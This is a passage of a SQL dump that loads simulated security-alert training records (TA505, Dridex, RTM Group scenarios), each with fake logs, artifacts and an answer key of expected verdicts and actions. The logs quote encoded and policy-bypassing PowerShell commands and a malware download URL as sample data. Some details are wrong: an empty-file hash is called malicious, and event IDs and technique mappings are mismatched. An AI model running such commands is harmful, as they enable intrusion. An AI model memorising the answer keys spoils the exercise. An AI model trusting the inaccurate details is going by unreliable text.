(1117, 'Unusual Data Movement: Potential Lateral Movement', 'high', 'Network Traffic Analysis', 'Anomalous network traffic detected involving potential lateral movement from a compromised host within the network to another internal system. The attacker appears to be using a known malicious IP to transfer data and execute commands on a secondary system.', 'Lateral Movement', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:33:45Z\",\"source_ip\":\"192.168.5.10\",\"destination_ip\":\"192.168.7.25\",\"external_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious_script.ps1\",\"username\":\"jdoe\",\"action\":\"File Transfer\",\"status\":\"Success\",\"description\":\"Suspicious file transfer observed from 192.168.5.10 to 192.168.7.25 using an external IP as a proxy.\"}', '2026-02-01 13:57:21', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Identified as a compromised internal host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with lateral movement activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in multiple malware campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"suspicious\",\"details\":\"PowerShell script often used in lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1118, 'Suspicious Software Installation Detected', 'medium', 'Endpoint Detection and Response (EDR) system', 'A suspicious software installation was detected on an endpoint within the network. The RTM Group has successfully infiltrated the financial institution\'s network by embedding their trojan in a popular accounting software update. This action was aimed at deceiving users into granting initial access.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"software_installation\",\"host_ip\":\"192.168.5.14\",\"username\":\"jdoe\",\"software_name\":\"AccountingPro Update\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"file_path\":\"C:\\\\Program Files\\\\AccountingPro\\\\update.exe\",\"attacker_ip\":\"203.0.113.45\",\"process_id\":5678,\"criticality\":\"medium\",\"description\":\"Installation of suspicious software update detected on host 192.168.5.14 by user jdoe. The software was downloaded from a malicious source associated with RTM Group.\"}', '2026-02-01 13:57:41', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of the individual who initiated the suspicious installation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by the RTM Group.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address linked to RTM Group activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1119, 'Unusual Script Execution on Workstations', 'high', 'Security Information and Event Management (SIEM) logs', 'An unauthorized script has been detected executing on a workstation, which is indicative of a trojan activation attempting to establish a covert communication channel with a command and control server operated by the RTM Group. This activity is associated with financial transaction monitoring.', 'Execution', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"hostname\":\"workstation-15\",\"username\":\"jdoe\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"203.0.113.45\",\"script_name\":\"update_check.ps1\",\"script_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\update_check.ps1\",\"detected_by\":\"SIEM\",\"event_id\":\"4720\",\"additional_info\":\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\"}', '2026-02-01 13:57:41', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised workstation.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP associated with RTM Group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a PowerShell script used by RTM Group malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"update_check.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used by RTM Group for malicious scripts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account on the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.838Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"hostname\\\":\\\"workstation-15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"script_name\\\":\\\"update_check.ps1\\\",\\\"script_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update_check.ps1\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"event_id\\\":\\\"4720\\\",\\\"additional_info\\\":\\\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.838Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"hostname\\\":\\\"workstation-15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"script_name\\\":\\\"update_check.ps1\\\",\\\"script_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update_check.ps1\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"event_id\\\":\\\"4720\\\",\\\"additional_info\\\":\\\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.838Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"hostname\\\":\\\"workstation-15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"script_name\\\":\\\"update_check.ps1\\\",\\\"script_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update_check.ps1\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"event_id\\\":\\\"4720\\\",\\\"additional_info\\\":\\\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.838Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"hostname\\\":\\\"workstation-15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"script_name\\\":\\\"update_check.ps1\\\",\\\"script_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update_check.ps1\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"event_id\\\":\\\"4720\\\",\\\"additional_info\\\":\\\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.838Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"hostname\\\":\\\"workstation-15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.102\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"script_name\\\":\\\"update_check.ps1\\\",\\\"script_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\update_check.ps1\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"event_id\\\":\\\"4720\\\",\\\"additional_info\\\":\\\"The script update_check.ps1 is not recognized as a legitimate script and its hash is associated with known malware.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1120, 'Persistent Network Anomalies', 'medium', 'Network Traffic Analysis', 'The RTM Group is suspected of maintaining persistent access within the network by utilizing legitimate software processes. Anomalous network traffic has been detected, indicating potential backdoor access via compromised software.', 'Persistence', 'T1505: Server Software Component', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:23Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.5\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"HTTPS\",\"user_agent\":\"legitimate-software-v3.1\",\"filename\":\"legit_software_updater.exe\",\"file_hash\":\"3a7bd3b456b9e6d8a1f3d4cb8f7c9b7de8b6a1f7\",\"username\":\"jdoe\",\"event_description\":\"Anomalous outbound connection detected potentially indicating a persistent backdoor. The process is utilizing legitimate update mechanisms to communicate with a known malicious IP.\"}', '2026-02-01 13:57:41', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with RTM Group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a7bd3b456b9e6d8a1f3d4cb8f7c9b7de8b6a1f7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash potentially linked to modified legitimate software used as a backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"legit_software_updater.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"clean\",\"details\":\"Commonly used legitimate software updater.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Active directory user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1121, 'Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email detected as part of TA505\'s signature campaign aimed at distributing the Dridex banking trojan. The email contained a malicious attachment intended to gain initial access to the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-08T14:22:35Z\",\"email_id\":\"e2f5b8d0-9c39-47a3-95b3-2f7a9e5f8e1b\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"sender_email\":\"malicious_actor@ta505campaign.com\",\"recipient_email\":\"john.doe@company.com\",\"subject\":\"Invoice Attached\",\"attachment\":{\"filename\":\"Invoice_2023.doc\",\"hash\":\"3f4d5c6a8b9e0f1234567890abcdef12\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"email_headers\":{\"from\":\"malicious_actor@ta505campaign.com\",\"to\":\"john.doe@company.com\",\"subject\":\"Invoice Attached\",\"message_id\":\"<1234567890@mail.ta505campaign.com>\"}}', '2026-02-01 13:58:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"malicious_actor@ta505campaign.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"malicious\",\"details\":\"Email involved in known TA505 phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Invoice_2023.doc\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f4d5c6a8b9e0f1234567890abcdef12\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known Dridex variant.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:22.841Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1122, 'Macro Execution in Document', 'high', 'Endpoint Detection and Response (EDR) Systems', 'Following successful delivery, the malicious document\'s macros are executed, initiating the download and installation of Dridex on the compromised system. The execution of the macro was detected on the endpoint, which downloaded the Dridex payload from a known malicious IP.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:18Z\",\"event_type\":\"macro_execution\",\"user\":\"jdoe\",\"host_ip\":\"192.168.1.15\",\"file_name\":\"invoice_2023.xlsm\",\"macro_id\":\"macro_001\",\"downloaded_payload\":{\"url\":\"http://malicious-domain.com/dridex.bin\",\"hash\":\"9f573a6b0b1a7d8c1f3e2b9d5a4c3e6f\",\"source_ip\":\"203.0.113.25\"},\"process\":{\"name\":\"excel.exe\",\"pid\":3456},\"external_ip\":\"203.0.113.25\",\"indicators\":[\"203.0.113.25\",\"9f573a6b0b1a7d8c1f3e2b9d5a4c3e6f\",\"invoice_2023.xlsm\"]}', '2026-02-01 13:58:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple Dridex campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9f573a6b0b1a7d8c1f3e2b9d5a4c3e6f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Dridex malware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice_2023.xlsm\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1123, 'Establishing Backdoor - TA505 Persistence', 'high', 'Network Traffic Analysis', 'TA505 is employing advanced techniques to maintain persistence within the network by establishing a backdoor. This facilitates the deployment of additional payloads such as Locky ransomware.', 'Persistence', 'T1105 - Ingress Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"443\",\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"file_hash\":\"9f2b4fc2b9e8b8f8c2d72e5bd4d9b826\",\"file_name\":\"backdoor_payload.exe\",\"command\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\backdoor_payload.exe\",\"action\":\"Connection Allowed\",\"additional_info\":{\"malware_family\":\"Locky\",\"c2_domain\":\"maliciousdomain.com\"}}', '2026-02-01 13:58:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP within internal network range\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known Command and Control (C2) server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9f2b4fc2b9e8b8f8c2d72e5bd4d9b826\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Locky ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_payload.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Uncommon filename observed in network traffic\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1124, 'Credential Dumping Detected', 'high', 'Security Information and Event Management (SIEM)', 'Credential dumping activity detected indicating potential lateral movement by threat actor TA505. The attacker aims to deploy Clop ransomware using harvested credentials.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-24T14:32:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"admin\",\"login_type\":\"Network\",\"process_name\":\"lsass.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"detected_by\":\"SIEM\",\"action_taken\":\"none\",\"description\":\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process lsass.exe.\"}', '2026-02-01 13:58:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with TA505 campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tools.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalRecords\",\"verdict\":\"suspicious\",\"details\":\"High-value target account used in unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.844Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin\\\",\\\"login_type\\\":\\\"Network\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"detected_by\\\":\\\"SIEM\\\",\\\"action_taken\\\":\\\"none\\\",\\\"description\\\":\\\"Unauthorized credential access detected on host 192.168.1.25 from IP 203.0.113.45 using process 